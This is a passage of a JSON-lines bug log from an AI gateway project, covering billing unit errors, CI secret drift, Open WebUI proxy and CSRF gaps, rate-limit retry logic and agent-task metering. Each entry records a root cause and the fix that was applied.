lint-no-currency-on-credit-surfaces, bans the currency formatters and Intl currency style outside money.ts and the three exempt surfaces.", "tags": ["billing", "frontend", "disclosure", "d-070", "web-console", "open-webui"]} +{"date": "2026-09-02", "issue": 1358, "title": "Projects promised files to every conversation and delivered none", "error_message": "A conversation created inside a Project answered as if the project's uploaded documents did not exist, while ProjectDetail.svelte stated 'Files here are given to every conversation in this project'.", "root_cause": "createBoundChat wrote only the hiveProject marker onto the chat blob and no code outside src/lib/hive/projects read it, so Chat.svelte's sendMessageSocket assembled the request files with no project document in them. The apparent fix, writing the attachment onto chat.files at bind time, also fails: sendMessageSocket prunes chatFiles to only those files some message in the branch references, so a chat level attachment is dropped on the first send and then written out of the persisted chat by the next save.", "fix": "Resolve the binding at request assembly instead of persisting it. Chat.svelte reads hiveProject off the chat blob at load, clears it on a new chat, and calls withProjectFiles(files, hiveProjectId) after the prune and dedupe in sendMessageSocket, the one function submit, regeneration and continue all reach. withProjectFiles appends { type: 'collection', id } , the same item the plus menu produces, so retrieval scope and access control are unchanged.", "tags": ["owui-fork", "projects", "rag", "claimed-state-no-reader", "chat-svelte", "frontend"]} +{"id": "interaction-gate-hosted-secret-precedence", "date": "2026-08-24", "area": "apps/web-console/tests/interaction", "error_message": "every authenticated route redirected to /auth/sign-in while the storage state file was complete", "root_cause": "The job read its five Supabase values from repository secrets after main had moved Web E2E onto a throwaway in-job Supabase; post cutover the secrets name a hosted project that no longer backs the console, so the minted cookies were never looked for. A job-level env entry also takes precedence over what a boot step writes to GITHUB_ENV, which would have kept the drift alive even after the throwaway stack existed.", "fix": "Boot scripts/ci-supabase-stack.sh inside the job and derive all five values from its output, mirroring Web E2E. Also moves the fixture seeder's verbose progress line to stderr so the seed-check step can JSON.parse its captured stdout.", "tags": ["ci", "supabase", "test-infrastructure", "session-establishment"]} +{"id": "interaction-gate-floating-mint", "date": "2026-08-11", "area": "apps/web-console/tests/interaction", "error_message": "Error reading storage state from tests/interaction/.auth/user.json: ENOENT", "root_cause": "An extensionless import of ../e2e/support/live-auth resolved to the synchronous .ts wrapper for tsc and to the asynchronous .mjs at run time. The unawaited promise floated, so the setup passed in 13ms without minting a session, and the sweep failed three hundred lines later on the missing file. The job also never passed SUPABASE_SERVICE_ROLE_KEY, so the mint would have thrown even once awaited.", "fix": "Call the documented live-auth.mjs command line form from the setup, assert the state file exists before the sweep may run, and pass the service role key in the workflow. Naming the .mjs in an import is not an alternative: Playwright's CommonJS output fails with 'exports is not defined' in ES module scope.", "tags": ["playwright", "test-infrastructure", "silent-failure", "module-resolution"]} +{"date": "2026-08-18", "error_message": "agent_tasks.result_summary_ref always held the agent's raw final-response text; a knowledge-work-pack deck was rendered nowhere and linked nowhere", "root_cause": "deckgen.Render and artifactsclient.Client (Create/AddVersion) had zero non-test callers; no bearer JWT ever reached the agent-engine host process to authenticate a publish call, and no file-output convention existed between the sandboxed agent and the host process", "fix": "added Task.BearerJWT threaded from edge-api's task-create handler through control-plane to the agent-engine daemon's /launch call; SandboxEngine.Status reads a single well-known .hive/deck.json manifest before reaping /workspace, renders it, and publishes via artifactsclient, overriding resultSummary with the artifact URL only on success; task-console now linkifies artifact-shaped refs via NEXT_PUBLIC_ARTIFACTS_BASE_URL; review fixes added a real off switch, idempotent publish via a per-session lock, os.Root-based TOCTOU-proof manifest reads, FIFO rejection, bearer-JWT lifetime bounding, and a distinguishable log line for expired-token publish failures", "tags": ["agent-engine", "artifacts", "cowork", "knowledge-work-pack", "result_summary_ref"]} +{"id": "bug-2026-08-31-webui-secret-key-regenerated-every-recreate", "date": "2026-08-31", "title": "WEBUI_SECRET_KEY was empty, so Open WebUI regenerated its session-signing key into a file outside every volume on every container recreate, logging everyone out on every deploy", "error_message": "WEBUI_SECRET_KEY empty in the open-webui container; Open WebUI's start.sh fell back to generating one into /app/backend/.webui_secret_key, which sits in the image filesystem outside every mounted volume, and was regenerated on the current deploy", "root_cause": "docker-compose.yml never set WEBUI_SECRET_KEY for the open-webui service, so start.sh's file-fallback branch always ran; the generated file lived under WORKDIR, not any named volume, so it was lost on every container recreate, and every push to main triggers a recreate via deploy-demo-box.yml. A new signing key on every recreate silently invalidates every previously signed session token, and the same root cause also rotated env.py's OAUTH_CLIENT_INFO_ENCRYPTION_KEY and OAUTH_SESSION_TOKEN_ENCRYPTION_KEY, which default to WEBUI_SECRET_KEY when unset.", "fix": "Set WEBUI_SECRET_KEY directly on the open-webui service in docker-compose.yml (dev-only literal fallback, same pattern as SEARXNG_SECRET) and wired the WEBUI_SECRET_KEY repository secret through deploy-demo-box.yml's existing env block the same way SEARXNG_SECRET already is. Setting the variable makes start.sh skip file generation entirely, so no mounted-path workaround was needed. Security review then closed two residual gaps: docker-compose.enterprise.yml now requires WEBUI_SECRET_KEY via a required-var expression for every deployment that merges it, including the demo box's own compose flags, so a manual out-of-band docker compose run without the secret exported fails loudly instead of silently using the public literal; and a new post-deploy workflow step hashes the container's effective WEBUI_SECRET_KEY and asserts it matches the repository secret and does not match the public literal, never logging the raw value. Verified live on hive-open-webui:v0.10.2-branded via docker run: unset reproduced two different secrets across two recreates; set reproduced the identical secret both times with no file written. Verified the enterprise override live via docker compose config under the demo box's exact profile flags.", "tags": ["open-webui", "auth", "session", "deploy", "docker-compose", "issue-1602"]} +{"id": "bug-2026-09-01-grant-subunits-posted-as-credits", "date": "2026-09-01", "title": "Credit grants posted a BDT subunit count into credits_delta, granting about one eighty-thousandth of the intended value", "error_message": "grants.CreateWithLedger wrote input.AmountBDTSubunits.Int64() into both public.credit_grants.amount_bdt_subunits and public.credit_ledger_entries.credits_delta, so a grant of 100000 subunits (BDT 1000, about 8 USD) credited the account with 100000 credits, 0.0001 USD of inference, short by a factor of CreditsPerUSD/SubunitsPerBDT/rate which is 81215 at the default rate of 123.13, about five orders of magnitude", "root_cause": "The grant amount is denominated in BDT subunits (paisa) at every layer: the JSON key, the column, the currency CHECK and the validation messages. The ledger is denominated in Hive credits at 1,000,000,000 per USD (D-031, D-046). The repository reinterpreted one as the other with no FX conversion and no scaling, the write-side twin of issue #1648. It survived its own tests because the service and handler suites go through a fake repository that never reaches the write, and it had never fired in production because no console surface calls the endpoint and control-plane is not publicly reachable", "fix": "Added payments.BDTSubunitsToCredits, the math/big inverse of CreditsToBDTSubunits (one exact rational, rounded half up once, negative amounts refused rather than clamped because this direction posts to an append-only ledger). grants.creditsForGrant resolves the platform rate (HIVE_USD_BDT_RATE or the documented default, not the recipient's fx_snapshots rate, because a grant is not a purchase and reconciles against no receipt), converts, and refuses any credit quantity beyond the ledger's bigint column instead of narrowing through Int64(). The conversion runs after the idempotency replay branch and inside the transaction, so a replay of an already committed grant never needs the rate and a refused first attempt still leaves no rows at all, the deferred rollback unwinding the idempotency key claim with everything else. credit_grants keeps the taka, credit_ledger_entries keeps the credits, and the ledger metadata records the subunits, the rate and its source plus the credit_unit stamp that migration 20260823_40's straggler detector keys on", "tags": ["money", "grants", "ledger", "unit-conflation", "fx", "math-big", "control-plane"], "issue": 1659} +{"id": "BUG-2026-08-16-web-e2e-session-pool", "date": "2026-08-16", "title": "Web E2E failed the flake gate on main: three specs passed only on retry because the shared Supabase session pool was exhausted", "error_message": "FATAL: (EMAXCONNSESSION) max clients reached in session mode - max clients are limited to pool_size: 15 (SQLSTATE XX000); surfaced as page.waitForURL timeout 25000ms and locator.inputValue timeout in three unrelated specs", "root_cause": "scripts/derive-pooler-dsn.py budgeted 6 of the project's 15 Supavisor session-mode slots to every control-plane it derived a DSN for, a number sized for the single long-lived demo box. Three ephemeral CI stacks boot per push (ci.yml web-e2e, ci.yml live-integration, agent-visual-proof.yml), so one push demanded 18 of 15 before the box's own 6, and control-plane's DB calls were refused mid-run. The console then rendered its error boundary or never finished the post-sign-in render, and the specs reported timeouts that read as three independent races.", "fix": "Default session budget cut from 6 to 4 with a new --session-max-conns flag and a floor of 2 (the tenant-settings listener pins one pool connection for process life, and a pool of max only survives max minus 2 concurrent account locks); deploy-demo-box.yml now asks for 6 explicitly, so an ephemeral consumer that forgets the flag fails safe. Web E2E additionally names EMAXCONNSESSION in an error annotation on failure and uploads the redacted Next.js server log, since the error boundary's cause lived only there.", "tags": ["ci", "e2e", "flake", "supabase", "supavisor", "pooler", "session-mode", "playwright"], "refs": ["run 31958356695", "job 95192819866", "#631", "#841"]} +{"id": "bug-2026-08-29-agent-console-second-signin", "date": "2026-08-29", "title": "Chat origin served a second sign in page at /agent-workspace", "error_message": "GET /agent-workspace/tasks -> 307 /agent-workspace/auth/sign-in for a browser already signed into chat", "root_cause": "apps/agent-console was reverse proxied onto the chat listener and ran its own @supabase/ssr session. Chat login is Open WebUI's OIDC flow, so the browser holds no Supabase cookie on that origin at all and the Supabase token is resolved server side and never returned, so the console's cookie read always found nothing and always redirected to its own sign in. Two independent identity systems that were never joined; the join that mattered had already shipped natively in PR #951, leaving a stale second front door.", "fix": "Removed the @agentConsole reverse_proxy from deploy/docker/Caddyfile.owui and added agent-workspace to the @removedSurfaces 404 matcher, re-homing the #1407 retry reasoning above @agentApi. Repointed the Tauri desktop shell at the deployment root with a read-time migration for stored pre-#540 URLs. Added scripts/test_caddy_one_front_door.py to make test-scripts, pinning both that no second application is proxied and that every agent proxy route still depends on get_verified_user.", "tags": ["auth", "caddy", "chat-origin", "agent-console", "desktop", "issue-540", "D-045"]} +{"date": "2026-08-25", "error_message": "ENOENT open '/app/.env.example' and ENOENT open '/app/docs/proof/chat-interaction-coverage-2026-08-10/coverage.run.json' during `docker compose run --build web-console npm run test:unit`; separately, components/catalog/model-catalog-table.test.ts silently skips its last assertion via it.skipIf", "root_cause": "Dockerfile.web-console uses the repo root as build context but only COPYs apps/web-console/, so any test reading a repo-root path (.env.example, deploy/, docs/proof/..., supabase/migrations/) gets ENOENT or a false existsSync inside the image, even though those files are present on disk in every other run context", "fix": "Added narrow COPY lines for .env.example, deploy/, the one coverage.run.json fixture under docs/proof/, and supabase/migrations/ into Dockerfile.web-console, landing each at the same /app-relative path the tests already resolve against; added matching entries to deploy-demo-box.yml's push.paths filter so a change to any of these still triggers a demo-box deploy; left the tests themselves untouched so a genuinely stale/missing fixture still fails loudly", "tags": ["web-console", "docker", "test-fixtures", "vitest", "dockerfile", "ci-paths-filter"]} +{"id": "bug-2026-08-23-ci-model-knob-wired-to-nothing", "date": "2026-08-23", "title": "A merge gate check drained the live demo's Groq daily token budget because its model selection knob was never forwarded into the test containers", "error_message": "Test timed out in 60000ms. (four SDK tests) with, only in the compose log artifact: Rate limit reached for model `openai/gpt-oss-20b` ... on tokens per day (TPD): Limit 200000, Used 199997, Requested 147", "root_cause": "ci.yml's live-integration job set HIVE_TEST_MODEL, the SDK suites read it, and the sdk-tests-js/py/java compose services declared only HIVE_BASE_URL and HIVE_API_KEY, so docker compose run never passed it into the container and the suites used their literal hive-default fallback. Both branches of the HIVE_TEST_MODEL ternary also evaluated to hive-default, and OPENROUTER_DEFAULT_MODEL, the variable the ternary actually switched, had been unused since route-openrouter-default was deleted. The 2026-08-22 catalog restructure then moved hive-default from OpenRouter onto Groq, so every run billed the live demo's shared free tier daily token budget. Separately, LiteLLM retried the resulting 429 and edge-api retried on top of that, multiplying one refusal into up to 16 upstream calls and pushing the request past the suites' 60 second timeout, so the failure presented as a timeout rather than a rate limit.", "fix": "Forward HIVE_TEST_MODEL and HIVE_EMBEDDING_MODEL through the sdk-tests compose services and default the job to deepseek-v4-flash on OpenRouter, a different provider account, overridable with vars.CI_LIVE_INTEGRATION_MODEL. Add tools/lint-sdk-test-env-propagation.mjs so a suite reading a variable nothing forwards fails loudly. Print and bound the run's metered token spend from usage_events and assert the alias billed is the alias selected. Classify an upstream refusal from the container logs into the job output and the filed tracking issue. Set router_settings.retry_policy RateLimitErrorRetries 0 so a rate limit surfaces in about 1.8 seconds instead of 11.5, measured against v1.98.0 with a 429 stub.", "tags": ["ci", "providers", "budget", "litellm", "rate-limit", "dead-config", "issue-1088", "issue-1089"]} +{"id": "BUG-2026-08-16-console-request-context-unmemoized", "date": "2026-08-16", "title": "Unmemoized per-call Supabase session revalidation crashed console pages on any transient hiccup", "error_message": "tests/e2e/console-budgets.spec.ts intermittently failed toBeVisible on a static page heading; a CI artifact showed the Next.js generic error boundary (Something went wrong on this page) had rendered instead of the budget settings page", "root_cause": "lib/control-plane/client.ts's getRequestContext() calls supabase.auth.getUser(), a real network round trip, and every one of its ~45 exported client functions calls it first with no memoization. The budget settings page alone makes 3 such calls (getViewer, getAccountProfile, getBudget) and its parent layout makes 3 more (getViewer, getBalance, getBudgetThreshold) on the same navigation, for up to 6 independent round trips per page load. getViewer() and getAccountProfile() had no failure handling for a non-404 error, unlike the adjacent getBudget().catch(() => null), so any one of those six calls hitting a transient upstream hiccup threw uncaught and crashed the whole Server Components tree. Investigated as a suspected regression from PR #878's budgets/http.go 403-code split and Go-only-PR path-filter skip; both refuted: that split only reaches the legacy /api/v1/accounts/current/budget endpoints this page never calls, #878 also touched web-console files and its own CI run (and the direct push-to-main run) were green with 0% flake, and ci.yml's web_e2e path filter already treats apps/control-plane/* as a trigger.", "fix": "Wrapped getRequestContext() in React's cache() so every control-plane client call within one server request shares a single session-revalidation result (scoped to the ~16 page.tsx/layout.tsx Server Components that see the benefit; ~15 Route Handler callers make one such call per invocation regardless and gain nothing from the dedup). Added a single retry on the underlying getUser() call, since cache() memoizes a rejection the same as a resolved value and would otherwise still crash on one failure per request instead of six. Closed the remaining throw path on the console layout and the budget page specifically: both now catch a getViewer() failure and redirect to sign-in instead of reaching the generic error boundary, and the budget page's getAccountProfile() failure degrades to the existing empty-profile shape. The other console pages that call getViewer() directly remain a separate follow-up.", "tags": ["web-console", "control-plane", "flaky-test", "performance", "resilience", "ci-investigation"], "issue": null} +{"id": "bug-mgo736-948-949", "timestamp": "2026-08-23T18:20:00.000Z", "related_bugs": [], "occurrences": 1, "last_seen": "2026-08-23T18:20:00.000Z", "title": "Caddy path glob never crosses a slash, so the chat origin's admin block covered only the bare mounts, and the deploy came to depend on the gap", "error_message": "Through the public chat origin, with a real Open WebUI admin session: POST /api/v1/functions/create 200, POST /api/v1/functions/id//toggle 200, GET /api/v1/configs/namespace/oauth 200 (returns oauth.client_secret), POST /api/v1/configs/import 200 (returns the same Config.get_all() the blocked configs/export does), and the Settings dialog's Admin Settings link opened the admin panel client side without ever requesting the 404'd address", "root_cause": "Three causes with one shape, a control that reads as present while being absent. (1) Caddy's path matcher falls through to Go path.Match when a pattern carries more than one wildcard, and there * never crosses /, so path /api/v*/configs* /api/v*/functions* matched the bare mounts and no child of them. (2) The configs block was a denylist of segments, so export was refused while import and namespace/{ns}, which return the same values from the same router, were not: the fourth instance of that family after #769 and #771. (3) The Admin Settings link removal lived only in owui-patches/hive_ui_surfaces.py, which rewrites the stock bundle that Dockerfile.open-webui then discards in favour of the build from vendor/open-webui, and the vendored source removal documented as its counterpart was never made. Compounding all three: the demo deploy installed hive_jwt_forward through the functions gap, so tightening the matcher first would have turned every deploy red at the install step.", "fix": "Reroute before blocking. scripts/install-owui-jwt-forward-in-container.sh runs the existing single-implementation installer inside the chat container against 127.0.0.1:8080, which satisfies its loopback-only token guard unchanged and adds no listener, and both callers (deploy-demo-box.yml, the nightly owui.setup.ts) use it. Then @adminMutationSubtree replaces the two globs with one default-deny path_regexp over the configs and functions subtrees, with a not arm for the single get_verified_user route under either (functions/id/{id}/valves/user/update). configs/(export|import|namespace|terminal_servers|tool_servers) closes the disclosure half for every verb. The Settings dialog link and the whole vendor/open-webui/src/routes/(app)/admin tree are deleted, with a built-bundle assertion in Dockerfile.open-webui verified in both directions. users, groups and models are deliberately untouched (#437): both routers carry get_verified_user writes, so a subtree block there is an outage rather than a fix.", "tags": ["caddy", "path-matcher", "open-webui", "security", "admin-surface", "deploy-ordering", "denylist-family"]} +{"id": "bug-2026-08-30-billable-seconds-refused-2xx-with-no-top-level-duration", "date": "2026-08-30", "title": "A valid transcription was refused with 502 whenever the provider omitted the top-level duration", "error_message": "audio: endpoint=/v1/audio/transcriptions alias=hive-stt upstream reported no audio duration; refusing rather than charging a guess", "root_cause": "billableSeconds in apps/edge-api/internal/audio/pricing.go read exactly one field, the top-level duration, and returned ok=false for its absence. ok=false routes to refuseUnpriceableResponse, which releases the hold and answers 502. Refusing is right when nothing can be metered, but it was the only outcome, so one missing field failed every transcription and translation across both call sites. The verbose_json body already carried per-segment end times that bound the audio length, and the same package already derived a duration from timestamps this way in lastCueSeconds. The assumption that the top-level field is always present was never confirmed against a live request: the live voice integration test does not run under -short and the Live integration job skips on pull requests.", "fix": "billableSeconds now reads the top-level duration first, falls back to the largest positive segments[].end, and only then reports unpriceable. A body carrying a top-level duration is priced from it alone, so no existing charge magnitude changes; the fallback is never a maximum taken across both sources. A missing, null or non-positive segment end is skipped rather than read as zero, because billedSeconds would raise a derived zero to the ten second provider minimum and charge for audio nothing accounts for. With neither source usable the response stays unpriceable and fails closed, unchanged (D-034). Rounding up to whole seconds moved into ceilSeconds and is shared by both sources. Review then found two more. Making segments a decode target meant an UnmarshalTypeError from a malformed segment discarded a top-level duration that had already decoded, refusing with 502 a body that main priced and charged, so the decode error is now fatal only when it left no usable duration behind. And the claim that a segment end is bounded by the real audio length was an expectation about the provider rather than an enforced bound: a segment end of 9e18 finalized 1,956,514,852,580,896,768 credits, as did a top-level duration of 9e18, and a crafted subtitle cue reached 39,814,225,700,210,450 credits because strconv.ParseInt clamps an out-of-range hours field to MaxInt64. maxBillableSeconds, one day of audio, now bounds every arm and refuses rather than clamps. The Int64 narrowing in metering.ChargeCredits that made those figures dangerous rather than merely large is filed as issue #1547.", "tags": ["billing", "audio", "transcription", "edge-api", "money-path", "fail-closed", "issue-680"], "files": ["apps/edge-api/internal/audio/pricing.go", "apps/edge-api/internal/audio/pricing_test.go"], "related_issues": [680, 671, 627, 1547, 1549]} +{"id": "BUG-2026-08-30-03", "date": "2026-08-30", "title": "Retry ladder paid full backoff against upstream limits it could never outlast", "error_message": "every 429 took the full 300ms/800ms/1800ms backoff, including limits whose reset was hours away", "root_cause": "The ladder treated all 429s as transient bursts. A limit whose reset is further away than the ladder's total budget cannot be waited out, so the backoff is pure delay, repeated on every request until the window rolls. A first fix classified on body text only, which is blind on OpenRouter, the provider this stack uses, because OpenRouter returns an identical body for its per-minute and per-day caps and only the headers separate them. That first fix also carried two regex defects found by running the patterns: an unanchored 4006 that also matched 40060, 40061, 400600 and 4006abc, and matching against the whole 8KB body so an echoed request payload could decide the verdict.", "fix": "Made Retry-After and X-RateLimit-Reset the primary, provider-neutral signal, authoritative in both directions, with the threshold derived from the sum of retryDelays rather than chosen. Kept a prose table for providers that send no headers, scoped to the provider's own message and code fields rather than the whole body. Anchored the Cloudflare code with six negative tests. Bounded the no-wait failover to one attempt so a pool-wide exhaustion does not fire the whole ladder back to back, stopped classifying the terminal attempt, and moved the response drain out of the delay branch so the zero-wait path does not leak a body and its pooled connection.", "tags": ["retry", "rate-limit", "openrouter", "input-parsing", "regex"], "related": ["#1064", "#1089"]} +{"id": "BUG-2026-08-30-02", "date": "2026-08-30", "title": "Rate limits imposed by default that nobody configured", "error_message": "defaultRatePolicy capped every account and key with no policy row at 60 RPM / 120000 TPM; both rate policy tables declared the same pair as column defaults", "root_cause": "Defaults supplied by code and by schema rather than by an operator. defaultRatePolicy reached the edge through the auth snapshot and was enforced in checkScope, and it was also displayed to customers as the baseline. A second set of placeholder pairs in the tier resolver looked live but was not: nothing outside tests constructs that resolver and nothing outside tests calls CheckWithTier, so those numbers were never enforced on any request, and a first draft of the fix wrongly described them as the live cap.", "fix": "Zeroed defaultRatePolicy and both tables' column defaults, with no backfill because UpdateLimits is the only writer of either table and always passes explicit values, so every existing row is operator-set. Changed NewTierResolverFromEnv to return an error and refuse an unparseable or negative value rather than falling back to zero, since zero now means unlimited and falling back would silently delete an operator's limit. Added lock_timeout to the migration because SET DEFAULT takes ACCESS EXCLUSIVE on two tables read on the authentication path.", "tags": ["rate-limit", "defaults", "auth", "security", "migration"], "related": ["#1064", "#1089"]} +{"id": "bug-2026-08-29-scheduled-agent-task-solvency-gate-missing", "date": "2026-08-29", "title": "A zero-credit tenant could create a routine whose sandbox launches ran unmetered on a cadence forever", "error_message": "agentsched.Scheduler.RunOnce called agenttask.Service.CreateTask with no balance check of any kind, so a tenant at zero available credits kept launching sandboxes on every cadence; the sibling gate added for the manual route sits on an edge-api HTTP route and cannot constrain a control-plane component calling the creation function in process", "root_cause": "The solvency gate for agent tasks was designed at the edge-api perimeter, which covers only one of the two callers of CreateTask. The scheduler reaches CreateTask directly inside control-plane and never traverses that perimeter. Three separate comments, on TaskCreator, on the agentsched package, and in cmd/server/main.go, all asserted that sharing the service path meant scheduled runs were metered like manual ones, which was false and is why nobody checked: two readers out of three would have been told the guard existed", "fix": "Added a Solvency seam to apps/control-plane/internal/agentsched answering three outcomes (solvent, insufficient, lookup failed) rather than two, reading tenant deployment posture and billing account in one left join and then ledger.Service.GetBalance, taking no hold because task spend is billed per model turn elsewhere and a hold here would strand. Called at schedule creation before the insert and again at every launch, since a tenant solvent at creation can be insolvent by the tenth run; proven with one test spanning both moments that goes red if either gate alone is removed. ENTERPRISE_EDGE tenants are exempt before the account is read, matching the chat path, after an initial version would have refused every self-hosted deployment permanently. Required constructor argument on NewService and NewScheduler, both panicking on nil. All three stale comments corrected", "tags": ["billing", "solvency", "agent-tasks", "control-plane", "fail-open", "stale-comment", "enterprise-posture", "issue-1490"]} +{"id": "bug-2026-08-29-samesite-assumed-cross-site-on-sibling-subdomain", "date": "2026-08-29", "area": "apps/web-console", "error_message": "No error surfaced: a CSRF gap on the console's mutating routes was documented as unexploitable because the Supabase session cookie is SameSite=Lax", "root_cause": "SameSite is scoped to the registrable domain, not the host. The demo box serves console-hive, chat-hive and artifacts-hive under one scubed.co, and the artifacts host serves untrusted HTML by design, so a form post from artifacts to console is same-site and the session cookie is sent. The issue, and the first version of the fix, both reasoned about cross-SITE requests and never checked the deployment's own topology", "fix": "Enforce an Origin check in middleware for every state-changing request, accepting the configured canonical origin or the host the request was addressed to, exempting safe methods and the SSLCommerz payment return; keep an explicit call on the nine console handlers; correct the comment that stated the false premise; file the shared-registrable-domain enabler as a separate issue", "tags": ["csrf", "samesite", "web-console", "middleware", "topology", "false-premise"]} +{"id": "BUG-2026-08-16-01", "date": "2026-08-16", "title": "Token streaming was off in every launched agent sandbox", "error_message": "No StreamingDeltaEvent was ever published by a Hive-launched conversation", "root_cause": "The vendored agent-server gates its token callback on any LLM having stream set (agent_server/event_service.py streaming_enabled), and openhands/sdk/llm/llm.py defaults LLM.stream to false. apps/agent-engine/internal/controlclient.LLMSettings serialised model, base_url, api_key and usage_id only, so every launch inherited the default and streaming was silently disabled.", "fix": "Added Stream to controlclient.LLMSettings (json name stream, no omitempty) and set it true on every inline agent_settings launch in apps/agent-engine/internal/engine. Regression guard asserts the raw launch body carries the JSON name, and a live differential capture (apps/agent-engine/cmd/streamproof) proves deltas flow mid-run and stop when the flag is false.", "tags": ["agent-engine", "openhands", "streaming", "default-off", "vendored-gate"]} +{"date": "2026-08-25", "area": "billing", "error_message": "prompt-cache tokens billed at the flat input rate on every fixed-price alias", "root_cause": "CreditsForTokens had no cache-read/cache-write term despite model_aliases.cache_read_price_credits/cache_write_price_credits existing end to end and reaching /v1/models; cache_creation_input_tokens had no struct field anywhere in edge-api so it was dropped at JSON unmarshal", "fix": "NormalizeCacheUsage partitions prompt tokens into fresh/cache-read/cache-write by wire shape (inclusive subtract vs exclusive add), CreditsForTokens prices all four components independently with a NULL-only fallback multiplier and a runtime magnitude guard; PR feat/cache-aware-billing", "tags": ["billing", "money-path", "cache", "pricing"]} +{"id": "2026-08-23-workflows-reading-deleted-supabase-project", "date": "2026-08-23", "title": "Six workflows configured themselves from a deleted Supabase project, one of them green while shipping the dead origin", "error_message": "socket.gaierror: [Errno -2] Name or service not known / error: (ENOTFOUND) tenant/user *** not found", "root_cause": "The hosted Supabase project was deleted during the move to the self-hosted data plane, but the ten SUPABASE_* repository secrets naming it were never repointed or removed. PR #983 and PR #1053 moved two workflows off them and the other six were left reading them. Nothing structural forbade the reference, so each new workflow adopted the pattern by copy-paste. deploy-web-console-workers was the dangerous instance because it stayed GREEN: it baked NEXT_PUBLIC_SUPABASE_URL from a pre-cutover secret into a Cloudflare Workers bundle nothing serves any more, so a passing deploy reported over a dead origin.", "fix": "Retired deploy-web-console-workers (the console has been served by web-console-prod behind Caddyfile.console since PR #456 and PR #605, and no hostname resolves to a Worker). Gave ci.yml's live-integration job literal placeholders, since it authenticates with its own seeded hk_ key and never reaches GoTrue. Pointed the three live-deployment jobs at vars.CONSOLE_URL, the deployment's public auth origin, and renamed their two key secrets to DEMO_SUPABASE_* so an unprovisioned value fails their existing input check by name instead of authenticating against a project that no longer exists. Added tools/lint-no-dead-supabase-secrets.mjs to the required repo-policy lint job, matching inside ${{ }} expressions only, with a MUST_CATCH/MUST_ALLOW self-test and a shrink-only pending list holding owui-nightly against #1055.", "tags": ["ci", "github-actions", "supabase", "self-hosted-cutover", "green-over-dead-backend", "secrets", "cloudflare-workers"]} +{"id": "BUG-1050", "date": "2026-08-23", "title": "Cowork visual-proof job failed repo-wide after the hosted Supabase project was deleted", "error_message": "database not available at startup: database unreachable after 13 attempt(s); pooler answered ENOTFOUND tenant/user not found; getaddrinfo returned Name or service not known for the project host", "root_cause": "agent-visual-proof.yml and owui-nightly.yml reconstructed their stack's Supabase URL and DSN from the SUPABASE_* repository secrets, which name the hosted project deleted during the move to the self-hosted data plane. PR #983 moved ci.yml onto a throwaway Postgres but these two workflows were not migrated, so control-plane never became healthy and the job died before capturing anything. Because the job is not a required check, every branch failed silently for four days while orchestrator rule 8 still depended on it. Two further traps sat behind the obvious one: an HS256-only GoTrue publishes an empty JWKS because internal/api/jwks.go skips keys with no public half, and edge-api refuses a plain http JWKS URL by design.", "fix": "Boot a throwaway Postgres, GoTrue and PostgREST per run via scripts/ci-supabase-stack.sh, as ci.yml already does. Added an opt-in --jwks-tls-ca mode giving GoTrue an EC signing key so its JWKS is non-empty, fronted by Caddy tls internal so edge-api's https-only guard is satisfied without being relaxed. Pinned NEXT_PUBLIC_SUPABASE_URL to the docker bridge address so the browser and the in-container agent-console agree on one origin. Removed every hosted-project secret from the job env, since a job-level entry overrides what a step writes to GITHUB_ENV. Added a failure-only notifier that reuses one tracking issue, so the next repo-wide break is not silent.", "tags": ["ci", "supabase", "jwks", "gotrue", "visual-proof", "silent-failure", "agent-visual-proof"]} +{"id": "bug-2026-09-02-margin-taken-twice", "date": "2026-09-02", "area": "billing", "severity": "high", "error_message": "Inference was priced at provider cost times 1.4 on every path while credit purchases carried no markup at all, so margin was taken on the burn and never at the point of sale.", "root_cause": "The 1.4 factor entered the codebase twice: applied by hand at migration authoring time into every fixed model_aliases price (D-032), and again at runtime as a 7/5 rational in the upstream_actual settlement path and its batch executor mirror. The purchase path had no markup term of any kind, and the FX fee that did exist was applied as a hardcoded 105/100 beside a stored fee_rate of 0.05, so the applied fee and the recorded fee agreed only by coincidence.", "fix": "Removed the 7/5 factor from both settlement paths, re-authored every margin-laden catalog price at the true provider list rate in migration 20260902_02_retire_alias_margin_factor.sql, added a 6 percent purchase markup in a new payments/purchase_price.go with a documented order of operations and one truncation per currency, dropped FXFeeRate to 0.025 and made fx.go derive its multiplier from it, and recorded the markup actually applied on the payment intent. Identity tests on both settlement paths go red if any multiplier is reintroduced.", "tags": ["billing", "pricing", "margin", "fx", "math-big", "migration", "D-064", "D-065", "D-066"], "issues": [1692, 1693], "pr": null} +{"id": "bug-2026-09-02-chat-search-billed-to-shim", "date": "2026-09-02", "title": "chat web search embeddings were billed to the shared OWUI shim account instead of the user who searched", "error_message": "none: the failure was silent by construction. Open WebUI's Python retrieval path posted to edge-api /v1/embeddings with RAG_OPENAI_API_KEY, which is OWUI_SHIM_KEY, so every hold and every charge resolved to that key's account and the searching customer's usage showed nothing.", "root_cause": "OWUI's embedding calls carry no request body, so the __metadata.upstream_auth carrier that attributes a chat completion cannot reach them, and requiresPerUserAuth in apps/edge-api/internal/auth/owui_unwrap.go deliberately excluded /v1/embeddings for that reason: the shim key was treated as the intended credential there. The header carrier X-Hive-Upstream-Auth already existed for the same problem on bodyless agent-task calls and was never applied here. Compounding it, edge-api had no JWT-session embeddings handler at all, so even a correctly attributed request could not have been served.", "fix": "Add /v1/embeddings to requiresPerUserAuth so a shim-key call with no per-user token is refused rather than billed to the shim. Add apps/edge-api/internal/embeddings, a JWT-session handler that holds, charges and settles through the existing sessionbilling lifecycle at the alias's catalog token price. Attach the signed-in user's access token to X-Hive-Upstream-Auth inside agenerate_openai_batch_embeddings via deploy/docker/owui-patches/apply_embed_attribution_1696_patch.py, raising rather than falling back to the shim when no user resolves.", "tags": ["billing", "money-path", "attribution", "fail-closed", "open-webui", "web-search", "embeddings", "edge-api", "issue-1696"]} +{"id": "openapi-spec-stale-understates-gateway", "priority": "P1", "date": "2026-08-25", "error_message": "Publicly served /api/openapi.yaml annotated 22 live endpoints planned_for_launch, including POST /v1/chat/completions, telling every integrator the gateway's primary endpoint was not shipped", "root_cause": "packages/openai-contract/generated/hive-openapi.yaml is generated from matrix/support-matrix.json by scripts/sync_hive_contract.py, but nothing in CI regenerates it or fails on drift. The matrix was edited three times (#352, #416, #573) without the generated spec being regenerated, so the spec kept the statuses of a much older matrix. Invisible until #1187 started serving the file publicly and rendering a spec-vs-matrix diff on /console/docs, which surfaced 89 disagreements.", "fix": "Ran packages/openai-contract/scripts/generate-matrix.sh to regenerate the spec from the committed matrix and the pinned upstream document, no hand edits. Status mismatches went 22 to 0 and total disagreements 89 to 67 (the remaining 67 are out_of_scope drops and Hive-native 